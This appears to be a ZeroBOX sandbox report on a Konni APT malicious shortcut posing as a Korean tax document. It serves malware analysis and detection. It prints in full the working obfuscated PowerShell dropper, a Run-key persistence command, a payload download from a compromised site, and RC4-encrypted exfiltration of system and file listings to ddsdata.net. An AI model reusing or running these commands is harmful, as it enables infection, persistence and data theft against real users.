Summary | ZeroBOX

Statement of undeclared funds (Enforcement Rules of the Value Added Tax Act).hwp.lnk.lnk

Generic Malware Antivirus Malicious Library GIF Format MSOffice File AntiDebug Lnk Format PE32 PE File CAB AntiVM PowerShell HWP
Category Machine Started Completed
FILE s1_win7_x6401 Dec. 14, 2023, 11:02 a.m. Dec. 14, 2023, 11:04 a.m.
Size 66.8MB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 ceb4847592b0b9ddc2b9c239fa48c471
SHA256 fbdc74e4a2733561fa077873a008e9aba4cf1415af1c6aaea2d8cb3ab435ddad
CRC32 31DF8329
ssdeep 3072:6I0dUkYRw0Oz+EQpmj3GGuP6MMbYEXLL3Tg80csCWv:dHRdOz+EQpG3GNP6ZLLjYj
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "HnbFriUQm" "C:\Users\test22\AppData\Local\Temp\Statement of undeclared funds (Enforcement Rules of the Value Added Tax Act).hwp.lnk.lnk"

    2552
    • cmd.exe "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);^<#letch overnegligently transactinide#^> $jpgrvGKusY=New-Object ^<#tornese ungospelized nondesignate#^>System.IO.FileStream($vOiCAahtou,^<#uncross traceless bonita#^>[System.IO.FileMode]::Open,^<#spasmotin aborigine panzootic#^>[System.IO.FileAccess]::Read);^<#wariangle aristolochiaceous fictioneering#^> $jpgrvGKusY.Seek($YTMhzLrhzIPV,^<#quipsomeness stercoral undeceptitious#^>[System.IO.SeekOrigin]::Begin);^<#marchantia oversoar duplicature#^> $VJOInKKXMRvQ=New-Object ^<#limnobium benzoic reefed#^>byte[] $ODtndleakm;^<#refries syndeses vermifugous#^> $jpgrvGKusY.Read($VJOInKKXMRvQ,^<#nonexemption preinitiated untruced#^>0,$ODtndleakm);^<#hematocytozoon commensalistic congregationalism#^> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc ^<#cavallas vapidness trabecule#^> $fNjGFHMrbWA ^<#semirigorously harmoniphone oxalated#^> $VJOInKKXMRvQ -Encoding ^<#irrefrangible rivalries dumontite#^> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);^<#rezbanyite orth gavelling#^> $KzOQvdcXYdjO=Get-ChildItem ^<#enheritage dialogite gorgonizing#^>-Path ^<#haemorrhagic aftershafted transplantar#^> $sBDFnkRezJN -Recurse ^<#preestimating arrivistes perfectionator#^>*.lnk ^<#unspillable thiobacteriales inverts#^>^| ^<#colliculate unwitch unmeekness#^>where-object ^<#apophyeeal oculauditory dackered#^>{$_.length ^<#cannonry resoluble diplocoria#^>-eq 0x042D9905} ^<#reendow unvoyaging engrossed#^>^| Select-Object ^<#certifiers gelechiid azeotrope#^>-ExpandProperty ^<#tabors lonhyn halavahs#^>FullName; return ^<#busybodyism cabrito sweepier#^> $KzOQvdcXYdjO;^<#pueblos pimas lutheran#^>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ ^<#muniments cryoconite cruets#^>-sBDFnkRezJN ^<#excludability hemen assassinative#^> $bKACpSJxmuLd;if($ofHLTkfBuY.length^<#bebite cesspits backstops#^> -eq 0){$ofHLTkfBuY=hwqBULFNvJ ^<#proceritic earned nondisturbing#^> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path ^<#disentrancement bomble dobule#^> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) ^<#jumma nonsensualistic grade#^>+ '';BYPVVObtSBg -vOiCAahtou ^<#homaxonic standbys gunbuilder#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#counterbend elvan chihuahua#^> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr ^<#cheselip centunculus hyperadipose#^> 0x10 -fNjGFHMrbWA ^<#pseudangina reemerge minchah#^> $lBLKeytyGN;^&^<#physis manipulated cauli#^> $lBLKeytyGN;$jsdoulrAkk=$env:public ^<#acuter orphrey remastication#^>+ '\' ^<#pest hazers jaspidean#^>+^<#anthryl koch seamy#^> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou ^<#seriating unrestrictedly huntsmen#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#hyperendocrinia inconsequence flandowser#^> 0x00006AB4 -ODtndleakm ^<#anilopyrin chondrodite dackers#^> 0x00013AA1 -MqCNDxmeLr ^<#semirebelliousness concretions uncolonizing#^> 0x20 -fNjGFHMrbWA ^<#wampuses perruche esotericist#^> $jsdoulrAkk;Remove-Item -Path ^<#unveritable scuttlebutt printmaker#^> $ofHLTkfBuY -Force;expand $jsdoulrAkk ^<#uncompliantly polemics tracheobronchitis#^> -F:* ^<#autogenously dhyana yus#^> ($env:public ^<#perorative influenced shader#^>+^<#cisjurane limericks unbeholden#^> '\' ^<#subpenaing varitype sciuroid#^>+^<#broomrape uncoloredly glandlike#^> 'documents');remove-item ^<#rimous zaptiahs cougher#^> -path ^<#strumectomy hoecake etherish#^> $jsdoulrAkk ^<#dwindlement periclasite pelargonidin#^>-force;$NjVWyNaCkCJM=$env:public^<#larcher rascalship slough#^>+'\documents\start.vbs';^&^<#paradisea parser diapaused#^> $NjVWyNaCkCJM;

      2680
      • powershell.exe powershell -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);<#letch overnegligently transactinide#> $jpgrvGKusY=New-Object <#tornese ungospelized nondesignate#>System.IO.FileStream($vOiCAahtou,<#uncross traceless bonita#>[System.IO.FileMode]::Open,<#spasmotin aborigine panzootic#>[System.IO.FileAccess]::Read);<#wariangle aristolochiaceous fictioneering#> $jpgrvGKusY.Seek($YTMhzLrhzIPV,<#quipsomeness stercoral undeceptitious#>[System.IO.SeekOrigin]::Begin);<#marchantia oversoar duplicature#> $VJOInKKXMRvQ=New-Object <#limnobium benzoic reefed#>byte[] $ODtndleakm;<#refries syndeses vermifugous#> $jpgrvGKusY.Read($VJOInKKXMRvQ,<#nonexemption preinitiated untruced#>0,$ODtndleakm);<#hematocytozoon commensalistic congregationalism#> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc <#cavallas vapidness trabecule#> $fNjGFHMrbWA <#semirigorously harmoniphone oxalated#> $VJOInKKXMRvQ -Encoding <#irrefrangible rivalries dumontite#> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);<#rezbanyite orth gavelling#> $KzOQvdcXYdjO=Get-ChildItem <#enheritage dialogite gorgonizing#>-Path <#haemorrhagic aftershafted transplantar#> $sBDFnkRezJN -Recurse <#preestimating arrivistes perfectionator#>*.lnk <#unspillable thiobacteriales inverts#>| <#colliculate unwitch unmeekness#>where-object <#apophyeeal oculauditory dackered#>{$_.length <#cannonry resoluble diplocoria#>-eq 0x042D9905} <#reendow unvoyaging engrossed#>| Select-Object <#certifiers gelechiid azeotrope#>-ExpandProperty <#tabors lonhyn halavahs#>FullName; return <#busybodyism cabrito sweepier#> $KzOQvdcXYdjO;<#pueblos pimas lutheran#>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ <#muniments cryoconite cruets#>-sBDFnkRezJN <#excludability hemen assassinative#> $bKACpSJxmuLd;if($ofHLTkfBuY.length<#bebite cesspits backstops#> -eq 0){$ofHLTkfBuY=hwqBULFNvJ <#proceritic earned nondisturbing#> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path <#disentrancement bomble dobule#> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) <#jumma nonsensualistic grade#>+ '';BYPVVObtSBg -vOiCAahtou <#homaxonic standbys gunbuilder#> $ofHLTkfBuY -YTMhzLrhzIPV <#counterbend elvan chihuahua#> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr <#cheselip centunculus hyperadipose#> 0x10 -fNjGFHMrbWA <#pseudangina reemerge minchah#> $lBLKeytyGN;&<#physis manipulated cauli#> $lBLKeytyGN;$jsdoulrAkk=$env:public <#acuter orphrey remastication#>+ '\' <#pest hazers jaspidean#>+<#anthryl koch seamy#> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou <#seriating unrestrictedly huntsmen#> $ofHLTkfBuY -YTMhzLrhzIPV <#hyperendocrinia inconsequence flandowser#> 0x00006AB4 -ODtndleakm <#anilopyrin chondrodite dackers#> 0x00013AA1 -MqCNDxmeLr <#semirebelliousness concretions uncolonizing#> 0x20 -fNjGFHMrbWA <#wampuses perruche esotericist#> $jsdoulrAkk;Remove-Item -Path <#unveritable scuttlebutt printmaker#> $ofHLTkfBuY -Force;expand $jsdoulrAkk <#uncompliantly polemics tracheobronchitis#> -F:* <#autogenously dhyana yus#> ($env:public <#perorative influenced shader#>+<#cisjurane limericks unbeholden#> '\' <#subpenaing varitype sciuroid#>+<#broomrape uncoloredly glandlike#> 'documents');remove-item <#rimous zaptiahs cougher#> -path <#strumectomy hoecake etherish#> $jsdoulrAkk <#dwindlement periclasite pelargonidin#>-force;$NjVWyNaCkCJM=$env:public<#larcher rascalship slough#>+'\documents\start.vbs';&<#paradisea parser diapaused#> $NjVWyNaCkCJM;

        2776
  • cmd.exe cmd /c C:\Users\Public\documents\25711309.bat

    3052
    • reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f

      1404
    • powershell.exe powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcBytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encBytes = New-Object byte[] $srcBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encBytes[$n] = $srcBytes[$n] -bxor $s[$t];}$encString = [System.Convert]::ToBase64String($encBytes);return $encString;}$url1 = 'https://aufildeseaux.com/wp-admin/includes/main/read/get.php?pw=xlse&cm=ns0010';$outfile = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web'; $key=(Get-Date).Ticks.ToString(); $qryStr = $url1.Split('?')[1]; $encoded = ES113 -src1205 $qryStr -Key $key;$url1=$url1.Split('?')[0]+'?'+$key+'='+[System.Web.HttpUtility]::UrlEncode($encoded);iwr -Uri $url1 -OutFile $outfile;"

      1264
    • powershell.exe powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_down.txt';$fp='C:\Users\Public\Documents\down.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}"

      2676
    • powershell.exe powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_docu.txt';$fp='C:\Users\Public\Documents\docu.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}"

      1016
    • powershell.exe powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_desk.txt';$fp='C:\Users\Public\Documents\desk.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}"

      2520
    • powershell.exe powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_sys.txt';$fp='C:\Users\Public\Documents\sys.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}"

      2088

Name Response Post-Analysis Lookup
ddsdata.net 5.255.127.177
IP Address Status Action
164.124.101.2 Active Moloch
5.255.127.177 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49181 -> 5.255.127.177:80 2046820 ET MALWARE [ANY.RUN] Konni.APT Exfiltration A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Program 'Statement of undeclared funds (Enforcement Rules of the Value Added Ta
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: x Act).hwp.lnk' failed to execute: No application is associated with the specif
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: ied file for this operation
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:2455
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: $fNjGFHMrbWA);<#letch overnegligently transactinide#> $jpgrvGKusY=New-Object <#
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: tornese ungospelized nondesignate#>System.IO.FileStream($vOiCAahtou,<#uncross t
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: raceless bonita#>[System.IO.FileMode]::Open,<#spasmotin aborigine panzootic#>[S
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: ystem.IO.FileAccess]::Read);<#wariangle aristolochiaceous fictioneering#> $jpgr
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: vGKusY.Seek($YTMhzLrhzIPV,<#quipsomeness stercoral undeceptitious#>[System.IO.S
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: eekOrigin]::Begin);<#marchantia oversoar duplicature#> $VJOInKKXMRvQ=New-Object
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: <#limnobium benzoic reefed#>byte[] $ODtndleakm;<#refries syndeses vermifugous#
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: > $jpgrvGKusY.Read($VJOInKKXMRvQ,<#nonexemption preinitiated untruced#>0,$ODtnd
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: leakm);<#hematocytozoon commensalistic congregationalism#> $jpgrvGKusY.Close();
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqq
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: JILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc <#cavallas vapidness
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: trabecule#> $fNjGFHMrbWA <#semirigorously harmoniphone oxalated#> $VJOInKKXMRvQ
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: -Encoding <#irrefrangible rivalries dumontite#> Byte;};function hwqBULFNvJ{par
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: am($sBDFnkRezJN);<#rezbanyite orth gavelling#> $KzOQvdcXYdjO=Get-ChildItem <#en
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: heritage dialogite gorgonizing#>-Path <#haemorrhagic aftershafted transplantar#
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: > $sBDFnkRezJN -Recurse <#preestimating arrivistes perfectionator#>*.lnk <#unsp
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: illable thiobacteriales inverts#>| <#colliculate unwitch unmeekness#>where-obje
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: ct <#apophyeeal oculauditory dackered#>{$_.length <#cannonry resoluble diplocor
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: ia#>-eq 0x042D9905} <#reendow unvoyaging engrossed#>| Select-Object <#certifier
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: s gelechiid azeotrope#>-ExpandProperty <#tabors lonhyn halavahs#>FullName; retu
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: rn <#busybodyism cabrito sweepier#> $KzOQvdcXYdjO;<#pueblos pimas lutheran#>};$
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ <#muniments cryoconite cruets#
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: >-sBDFnkRezJN <#excludability hemen assassinative#> $bKACpSJxmuLd;if($ofHLTkfBu
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: Y.length<#bebite cesspits backstops#> -eq 0){$ofHLTkfBuY=hwqBULFNvJ <#proceriti
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: c earned nondisturbing#> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path <#di
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: sentrancement bomble dobule#> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: ,$ofHLTkfBuY.length-4) <#jumma nonsensualistic grade#>+ '';BYPVVObtSBg -vOiCAah
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: tou <#homaxonic standbys gunbuilder#> $ofHLTkfBuY -YTMhzLrhzIPV <#counterbend e
console_handle: 0x000001a3
1 1 0

WriteConsoleW

buffer: lvan chihuahua#> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr <#cheselip centu
console_handle: 0x000001af
1 1 0

WriteConsoleW

buffer: nculus hyperadipose#> 0x10 -fNjGFHMrbWA <#pseudangina reemerge minchah#> $lBLKe
console_handle: 0x000001bb
1 1 0

WriteConsoleW

buffer: ytyGN;& <<<< <#physis manipulated cauli#> $lBLKeytyGN;$jsdoulrAkk=$env:public <
console_handle: 0x000001c7
1 1 0

WriteConsoleW

buffer: #acuter orphrey remastication#>+ '\' <#pest hazers jaspidean#>+<#anthryl koch s
console_handle: 0x000001d3
1 1 0

WriteConsoleW

buffer: eamy#> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou <#seriating unrestrictedly huntsmen
console_handle: 0x000001df
1 1 0

WriteConsoleW

buffer: #> $ofHLTkfBuY -YTMhzLrhzIPV <#hyperendocrinia inconsequence flandowser#> 0x000
console_handle: 0x000001eb
1 1 0

WriteConsoleW

buffer: 06AB4 -ODtndleakm <#anilopyrin chondrodite dackers#> 0x00013AA1 -MqCNDxmeLr <#s
console_handle: 0x000001f7
1 1 0

WriteConsoleW

buffer: emirebelliousness concretions uncolonizing#> 0x20 -fNjGFHMrbWA <#wampuses perru
console_handle: 0x00000203
1 1 0

WriteConsoleW

